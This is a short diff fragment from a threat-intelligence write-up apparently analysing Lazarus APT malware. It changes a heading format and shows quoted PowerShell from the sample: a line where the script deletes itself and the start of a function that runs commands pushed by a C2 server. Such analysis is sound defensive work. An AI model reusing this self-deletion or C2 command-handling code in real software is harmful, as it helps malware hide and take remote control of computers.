StrangerealIntel/CyberThreatIntel/North Korea/APT/Lazarus/23-10-19/analysis.md

 try{Remove-Item -Path $MyInvocation.MyCommand.Source}catch{}
 main
 ```
-###### In function of the result of the id push by the C2, this execute the following actions in the infected computer.
+<h6> In function of the result of the id push by the C2, this execute the following actions in the infected computer.</h6>
 ``` powershell
 function command($url)
 {